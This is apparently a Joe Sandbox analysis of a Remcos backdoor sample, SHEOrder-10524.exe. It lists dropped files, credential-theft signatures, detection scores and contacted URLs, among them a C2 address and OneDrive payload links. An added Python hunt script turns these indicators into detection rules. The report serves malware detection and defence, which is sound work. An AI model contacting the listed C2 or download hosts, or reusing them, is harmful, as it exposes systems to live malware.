  Dropped: C:\Users\Public\Libraries\Wagotghl.PIF (PE32)
  Signatures: Drops PE files with a suspicious file extension

cmd.exe [24]
  Started: conhost.exe [37]

lhgtogaW.pif [30]
  Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)

lhgtogaW.pif [33]
  Signatures: Tries to harvest and steal browser information (history, passwords, etc)
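Added example, not part of the Joe Sandbox report: a small hunt script that turns the indicators in the behavior graph above into detection logic over Sysmon-style events. The dropped-file paths, the 91.223.3.151:4508 C2 endpoint and the geoplugin.net address come from the report; the heuristics are modelled on the Sigma rule titles the report lists (execution from a suspicious folder, a Run key pointing to a suspicious folder, network connections from a suspicious program location). The `Event` schema, the sample event records, and the Run key name and value are constructed assumptions for the demonstration; the report only states that a Run key was created.

```python
"""Hunt for the reported Remcos/DBatLoader chain in Sysmon-style telemetry.

Added example. Indicators are taken from the report's behavior graph and
dropped-file list; the event records below are constructed, not captured.
"""
from __future__ import annotations

from dataclasses import dataclass
from pathlib import PureWindowsPath

# Hard indicators observed in the report.
DROPPED_FILES = {
    r"C:\Users\Public\Libraries\lhgtogaW.pif",
    r"C:\Users\Public\Libraries\Wagotghl.PIF",
    r"C:\Users\Public\Libraries\easinvoker.exe",
    r"C:\Users\Public\Libraries\netutils.dll",
    r"C:\Users\Public\Wagotghl.url",
    r"C:\ProgramData\remcos\logs.dat",
}
C2_ENDPOINTS = {("91.223.3.151", 4508)}   # Remcos C2 from the behavior graph
GEO_LOOKUP_IPS = {"178.237.33.50"}         # geoplugin.net geolocation check

# Behavioural heuristics modelled on the Sigma rule titles in the report.
SUSPICIOUS_DIRS = (r"C:\Users\Public", r"C:\ProgramData")
SUSPICIOUS_EXECUTABLE_EXTS = {".pif"}      # extension this sample abuses; extend as needed
RUN_KEY_FRAGMENT = r"\Microsoft\Windows\CurrentVersion\Run"


def _norm(path: str) -> str:
    """Case-fold a Windows path so comparisons are case-insensitive."""
    return str(PureWindowsPath(path)).casefold()


def _in_suspicious_dir(path: str) -> bool:
    p = _norm(path)
    return any(p.startswith(_norm(d) + "\\") for d in SUSPICIOUS_DIRS)


@dataclass
class Event:
    """Minimal Sysmon-like record (assumed schema)."""
    kind: str          # ProcessCreate | FileCreate | NetworkConnect | RegistryValueSet
    image: str = ""    # process that performed the action
    target: str = ""   # file path, registry value name, or destination IP
    port: int = 0      # destination port for NetworkConnect
    detail: str = ""   # registry data for RegistryValueSet


def hunt(events: list[Event]) -> list[tuple[str, str]]:
    """Return (rule, evidence) pairs combining exact IOC hits with heuristics."""
    findings: list[tuple[str, str]] = []
    norm_iocs = {_norm(f) for f in DROPPED_FILES}
    for ev in events:
        if ev.kind == "FileCreate" and _norm(ev.target) in norm_iocs:
            findings.append(("ioc_dropped_file", ev.target))
        if ev.kind == "ProcessCreate":
            ext = PureWindowsPath(ev.image).suffix.casefold()
            if _in_suspicious_dir(ev.image) and ext in SUSPICIOUS_EXECUTABLE_EXTS:
                findings.append(("execution_from_suspicious_folder", ev.image))
        if ev.kind == "NetworkConnect":
            if (ev.target, ev.port) in C2_ENDPOINTS:
                findings.append(("ioc_c2_connection", f"{ev.target}:{ev.port}"))
            elif ev.target in GEO_LOOKUP_IPS:
                findings.append(("ioc_geolocation_lookup", ev.target))
            if _in_suspicious_dir(ev.image):
                findings.append(("suspicious_program_location_with_network", ev.image))
        if ev.kind == "RegistryValueSet":
            if RUN_KEY_FRAGMENT.casefold() in ev.target.casefold() and _in_suspicious_dir(ev.detail):
                findings.append(("run_key_to_suspicious_folder", ev.detail))
    return findings


# Constructed sample telemetry mirroring the reported chain (not from the report).
SAMPLE_EVENTS = [
    Event("FileCreate", r"C:\Users\user\Desktop\SHEOrder-10524.exe", r"C:\Users\Public\Libraries\lhgtogaW.pif"),
    Event("FileCreate", r"C:\Users\user\Desktop\SHEOrder-10524.exe", r"C:\Users\Public\Libraries\netutils.dll"),
    Event("ProcessCreate", r"C:\Users\Public\Libraries\lhgtogaW.pif"),
    Event("NetworkConnect", r"C:\Users\Public\Libraries\lhgtogaW.pif", "91.223.3.151", 4508),
    Event("NetworkConnect", r"C:\Users\Public\Libraries\lhgtogaW.pif", "178.237.33.50", 80),
    Event("FileCreate", r"C:\Users\Public\Libraries\lhgtogaW.pif", r"C:\ProgramData\remcos\logs.dat"),
    # Run key name and value are assumed; the report only says a Run key was created.
    Event("RegistryValueSet", r"C:\Users\user\Desktop\SHEOrder-10524.exe",
          r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Wagotghl",
          detail=r"C:\Users\Public\Wagotghl.url"),
    Event("ProcessCreate", r"C:\Windows\System32\cmd.exe"),  # benign control event
]

if __name__ == "__main__":
    for rule, evidence in hunt(SAMPLE_EVENTS):
        print(f"{rule:45} {evidence}")
```

The exact-match rules are only useful against this sample; the three heuristic rules are the ones worth keeping, and the geolocation lookup (geoplugin.net right after the C2 connection) is a cheap corroborating signal because Remcos performs it on start-up.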

Source | Detection | Scanner | Label
SHEOrder-10524.exe | 47% | ReversingLabs | Win32.Backdoor.Remcos
SHEOrder-10524.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\Public\Libraries\Wagotghl.PIF | 100% | Joe Sandbox ML |
C:\Users\Public\Libraries\Wagotghl.PIF | 47% | ReversingLabs | Win32.Backdoor.Remcos
C:\Users\Public\Libraries\easinvoker.exe | 0% | ReversingLabs |
C:\Users\Public\Libraries\lhgtogaW.pif | 3% | ReversingLabs |
C:\Users\Public\Libraries\netutils.dll | 29% | ReversingLabs | Win64.Trojan.Zusy
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
http://www.imvu.comr | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
https://aefd.nelreports.net/api/report?cat=bingth | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | 0% | URL Reputation | safe
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | URL Reputation | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 100% | URL Reputation | phishing
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
https://aefd.nelreports.net/api/report?cat=wsb | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
https://aefd.nelreports.net/api/report?cat=bingaot | 0% | URL Reputation | safe
https://aefd.nelreports.net/api/report?cat=bingrms | 0% | URL Reputation | safe
http://ocsp.sectigo.com0C | 0% | URL Reputation | safe
http://www.ebuddy.com | 0% | URL Reputation | safe
http://www.imvu.comta | 0% | Avira URL Cloud | safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742 | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpZ | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpH | 0% | Avira URL Cloud | safe
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c | 0% | Avira URL Cloud | safe
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8 | 0% | Avira URL Cloud | safe
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d | 0% | Avira URL Cloud | safe
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc | 0% | Avira URL Cloud | safe
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68 | 0% | Avira URL Cloud | safe
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326 | 0% | Avira URL Cloud | safe
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437 | 0% | Avira URL Cloud | safe
91.223.3.151 | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpu | 0% | Avira URL Cloud | safe
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7 | 0% | Avira URL Cloud | safe
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03 | 0% | Avira URL Cloud | safe
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5 | 0% | Avira URL Cloud | safe
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dual-spov-0006.spov-msedge.net | 13.107.139.11 | true | false | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
onedrive.live.com | unknown | unknown | false | | high
bnaqzw.sn.files.1drv.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://onedrive.live.com/download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc | false | | high
91.223.3.151 | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.imvu.comr | lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W | bhv1938.tmp.5.dr | false | | high
http://www.imvu.comta | lhgtogaW.pif, 00000007.00000003.1781518005.000000000091D000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000007.00000003.1781576573.000000000091D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad | bhv1938.tmp.5.dr | false | | high
https://aefd.nelreports.net/api/report?cat=bingth | bhv1938.tmp.5.dr | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc | bhv1938.tmp.5.dr | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net | lhgtogaW.pif, 00000005.00000002.1794411249.0000000000193000.00000004.00000010.00020000.00000000.sdmp | false | | high
https://aefd.nelreports.net/api/report?cat=bingaotak | bhv1938.tmp.5.dr | false | URL Reputation: safe | unknown
https://deff.nelreports.net/api/report?cat=msn | bhv1938.tmp.5.dr | false | URL Reputation: safe | unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr | bhv1938.tmp.5.dr | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742 | bhv1938.tmp.5.dr | false | Avira URL Cloud: safe | unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr | bhv1938.tmp.5.dr | false | | high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51 | bhv1938.tmp.5.dr | false | | high
https://onedrive.live.com/ | SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000002.1884851023.000000000088E000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000636000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://bnaqzw.sn.files.1drv.com/y4mjSrmVGqdqL8hnH_btf-6Qys453bsv2FyIiEEOlZHaw9haei9AHV5FIa03OCcOV-q | Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000662000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c | bhv1938.tmp.5.dr | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpH | lhgtogaW.pif, 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795167395.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1777938226.000000002415C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1797585028.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1752093906.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1796644094.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | SHEOrder-10524.exe, 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp | true | URL Reputation: phishing | unknown
https://maps.windows.com/windows-app-web-link | bhv1938.tmp.5.dr | false | | high
https://bnaqzw.sn.files.1drv.com/W | SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008EC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | bhv1938.tmp.5.dr | false | URL Reputation: safe | unknown
https://live.com/ | SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000002.1885488700.0000000000902000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000651000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000671000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8 | bhv1938.tmp.5.dr | false | Avira URL Cloud: safe | unknown
https://login.yahoo.com/config/login | lhgtogaW.pif | false | | high
https://bnaqzw.sn.files.1drv.com:443/y4mFB-7cF0RJhpIN7Sx_6Q1D2DImE5mQPbbhluzK7S-dhQrKxqFk72nhp4k4_Sd | Wagotghl.PIF, 00000008.00000002.1885488700.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.00000000008EB000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.nirsoft.net/ | lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpZ | lhgtogaW.pif, 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795167395.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1777938226.000000002415C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1797585028.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1752093906.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1796644094.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d | bhv1938.tmp.5.dr | false | | high
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d | bhv1938.tmp.5.dr | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | bhv1938.tmp.5.dr | false | | high
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.office.com/ | bhv1938.tmp.5.dr | false | | high
https://bnaqzw.sn.files.1drv.com/y4mFB-7cF0RJhpIN7Sx_6Q1D2DImE5mQPbbhluzK7S-dhQrKxqFk72nhp4k4_SdW3Ee | Wagotghl.PIF, 00000008.00000003.1882438284.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000002.1885488700.000000000091D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8 | bhv1938.tmp.5.dr | false | | high
https://sectigo.com/CPS0 | SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68 | bhv1938.tmp.5.dr | false | Avira URL Cloud: safe | unknown
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2 | bhv1938.tmp.5.dr | false | | high
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d | bhv1938.tmp.5.dr | false | Avira URL Cloud: safe | unknown
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437 | bhv1938.tmp.5.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.com | lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000003.1781518005.000000000091D000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000007.00000003.1781576573.000000000091D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aefd.nelreports.net/api/report?cat=wsb | bhv1938.tmp.5.dr | false | URL Reputation: safe | unknown
https://bnaqzw.sn.files.1drv.com/y4mUNi1irqpVap8qJ_hkhgVkZ9e6GpCglPli4DYI3goIWfA8FsMCycwJbzbnR6k4jns | SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008EC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326 | bhv1938.tmp.5.dr | false | Avira URL Cloud: safe |
                                                                          unknown
                                                                          https://bnaqzw.sn.files.1drv.com:443/y4msc3kYI7yGn3gEL_3gJvdpmyEkhOCRDBRFk1eCCUOzN0wBjvROvE3UIu0RkWHWagotghl.PIF, 0000000B.00000003.1938923041.0000000000651000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://geoplugin.net/json.gpulhgtogaW.pif, 00000004.00000003.1777938226.000000002415C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1752093906.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhv1938.tmp.5.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://onedrive.live.com/download?resid=B24528E77689F9AC%21162&authkey=Wagotghl.PIF, 0000000B.00000002.1949920072.0000000013C40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://aefd.nelreports.net/api/report?cat=bingaotbhv1938.tmp.5.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhv1938.tmp.5.drfalse
                                                                                high
                                                                                https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhv1938.tmp.5.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhv1938.tmp.5.drfalse
                                                                                  high
                                                                                  https://aefd.nelreports.net/api/report?cat=bingrmsbhv1938.tmp.5.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhv1938.tmp.5.drfalse
                                                                                    high
                                                                                    https://www.google.com/accounts/serviceloginlhgtogaW.piffalse
                                                                                      high
                                                                                      https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhv1938.tmp.5.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhv1938.tmp.5.drfalse
                                                                                        high
                                                                                        https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhv1938.tmp.5.drfalse
                                                                                          high
                                                                                          https://bnaqzw.sn.files.1drv.com:443/y4mUNi1irqpVap8qJ_hkhgVkZ9e6GpCglPli4DYI3goIWfA8FsMCycwJbzbnR6kSHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
